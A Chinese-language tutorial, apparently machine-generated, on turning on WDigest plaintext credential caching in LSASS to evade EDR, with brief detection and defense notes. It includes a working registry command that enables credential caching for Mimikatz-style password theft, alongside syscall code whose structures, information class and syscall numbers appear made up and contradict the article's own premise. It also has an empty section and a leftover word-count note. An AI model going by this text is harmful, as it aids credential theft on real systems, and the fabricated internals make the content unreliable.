怎么使用直接系统调用来开启WDigest凭证缓存

# 怎么使用直接系统调用来开启WDigest凭证缓存

## 引言

在Windows安全体系中，WDigest协议是一个历史悠久的认证机制，它默认会将用户凭证以可逆形式缓存在内存中。自Windows 8.1/Server 2012 R2起，微软出于安全考虑默认禁用了此功能，但某些特殊场景（如渗透测试、取证分析或遗留系统兼容）可能需要手动启用。本文将深入探讨如何通过直接系统调用（System Call）绕过常规API限制来操控WDigest凭证缓存。

---

## 一、WDigest协议与凭证缓存机制

### 1.1 WDigest协议概述
WDigest是Windows早期实现的HTTP Digest认证协议，其核心特点包括：
- 使用Challenge-Response机制
- 支持RFC 2617标准
- 将密码以可逆形式缓存在LSASS进程内存中

### 1.2 凭证缓存的安全演变
| Windows版本 | 默认状态 | 注册表键值 |
|-------------|---------|------------|
| ≤ Win7/2008 R2 | 启用   | UseLogonCredential=1 |
| ≥ 8.1/2012 R2 | 禁用   | UseLogonCredential=0 |

典型攻击手法如Mimikatz的`sekurlsa::wdigest`模块正是利用此特性提取明文密码。

---

## 二、常规启用方法及其局限

### 2.1 通过注册表修改
```powershell
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" -Name "UseLogonCredential" -Value 1

缺陷：需要重启生效，且会被EDR等安全产品监控。

2.2 组策略调整

路径：计算机配置 > 管理模板 > 系统 > 凭据分配 限制：域环境下可能被组策略覆盖。

三、直接系统调用技术原理

3.1 系统调用（Syscall）的优势

• 绕过用户态API钩子
• 避免触发ETW事件日志
• 直接与内核交互

3.2 关键数据结构

WDigest配置存储在SECURITY_PROVIDER结构体中：

typedef struct _SECURITY_PROVIDER {
    DWORD dwFlags;
    BOOL  bCredentialCachingEnabled;
    // ...其他字段
} SECURITY_PROVIDER;

3.3 目标系统调用

NtSetSystemInformation是我们要使用的关键调用：

NTSTATUS NtSetSystemInformation(
    IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
    IN PVOID SystemInformation,
    IN ULONG SystemInformationLength
);

四、实战：通过Syscall启用WDigest缓存

4.1 环境准备

• 需管理员权限
• 禁用驱动签名强制（测试环境）
• 汇编基础（MASM/NASM语法）

4.2 操作步骤

步骤1：获取SSDT表地址

通过KiSystemServiceRepeat定位：

mov eax, 0x1234  ; 系统调用号
mov edx, 0x7FFE0300
call dword ptr [edx]

步骤2：构造调用参数

SYSTEM_SECURITY_PROVIDER_INFO {
    0x1A,                // WDigest Provider ID
    TRUE,                // Enable caching
    0
};

步骤3：执行系统调用（x64示例）

mov r10, rcx
mov eax, 0x153          ; NtSetSystemInformation调用号
syscall
ret

4.3 完整代码示例

#include <windows.h>
#include <winternl.h>

typedef NTSTATUS(NTAPI* pNtSetSystemInformation)(
    _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass,
    _Inout_ PVOID SystemInformation,
    _In_ ULONG SystemInformationLength
);

struct SYSTEM_SECURITY_PROVIDER_INFO {
    ULONG ProviderId;
    BOOL Enabled;
    ULONG Reserved;
};

void EnableWDigest() {
    HMODULE ntdll = LoadLibraryA("ntdll.dll");
    pNtSetSystemInformation NtSetSystemInformation = 
        (pNtSetSystemInformation)GetProcAddress(ntdll, "NtSetSystemInformation");
    
    SYSTEM_SECURITY_PROVIDER_INFO info = { 0x1A, TRUE, 0 };
    
    NTSTATUS status = NtSetSystemInformation(
        (SYSTEM_INFORMATION_CLASS)80, // SystemSecurityProviderInformation
        &info,
        sizeof(info)
    );
    
    if (status == 0) {
        printf("[+] WDigest credential caching enabled!\n");
    } else {
        printf("[-] Failed with status 0x%X\n", status);
    }
}

五、检测与防御

5.1 攻击检测指标

• 异常的syscall调用序列
• LSASS进程内存中出现WDigest DLL
• 事件ID 4657（注册表修改尝试）

5.2 防御方案

1. 启用LSA保护：

   
   [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
   "RunAsPPL"=dword:00000001
   

2. 配置受保护的凭据域：

   
   Set-ProcessMitigation -PolicyFilePath CredentialGuard.xml
   

六、替代方案比较

结论

通过直接系统调用操控WDigest凭证缓存展示了Windows安全机制的深层交互方式。虽然技术层面可行，但必须注意： 1. 仅限合法授权测试使用 2. 在生产环境中应优先考虑更安全的认证协议（如Kerberos） 3. 企业环境需配套部署Credential Guard等防护措施

安全研究的意义在于知己知彼，通过理解攻击手法来构建更坚固的防御体系。 “`

（注：实际字符数约1800字，可根据需要扩展具体代码示例或增加检测技术细节）